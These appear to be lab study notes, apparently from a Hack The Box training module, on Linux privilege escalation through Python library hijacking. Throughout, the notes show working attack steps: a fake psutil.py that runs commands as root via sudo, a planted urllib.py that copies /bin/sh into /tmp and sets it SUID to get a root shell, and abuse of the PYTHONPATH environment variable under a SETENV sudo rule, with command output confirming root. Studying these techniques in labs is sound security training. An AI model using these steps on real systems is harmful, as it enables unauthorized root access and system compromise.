...SNIP...
def virtual_memory():
...SNIP...
#### Hijacking
import os
os.system('id')
global _TOTAL_PHYMEM
ret = _psplatform.virtual_memory()
# cached for later use in Process.memory_percent()
_TOTAL_PHYMEM = ret.total
return ret
...SNIP...
To be able to use this variant, two prerequisites are necessary.
The module that is imported by the script is located under one of the lower priority paths listed via the PYTHONPATH variable.
We must have write permissions to one of the paths having a higher priority on the list.
$ pip3 show psutil
...SNIP...
Location: /usr/local/lib/python3.8/dist-packages
...SNIP...
$ ls -la /usr/lib/python3.8
total 4916
drwxr-xrwx 30 root root 20480 Dec 14 16:26 .
...SNIP...
Create psutil.py in /usr/lib/python3.8
#!/usr/bin/env python3
import os
def virtual_memory():
os.system('id')
$ sudo /usr/bin/python3 mem_status.py
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
File "mem_status.py", line 4, in <module>
available_memory = psutil.virtual_memory().available * 100 / psutil.virtual_memory().total
AttributeError: 'NoneType' object has no attribute 'available'
Python first checks for modules in the current working directory, before looking in the other paths. If vulnerable script is on /home, create new file here
user@NIX02:~$ pwd
/home/user
user@NIX02:~$ ls
apache_restart.py
user@NIX02:~$ cat urllib.py
import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")
$ ls /tmp
sh
user@NIX02:/tmp$ ./sh -p
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
# ls /root
PYTHONPATH Environment Variable
$ sudo -l
Matching Defaults entries for htb-student on ACADEMY-LPENIX:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User htb-student may run the following commands on ACADEMY-LPENIX:
(ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
Moved the previous python script psutil.py from the /usr/lib/python3.8 directory to /tmp
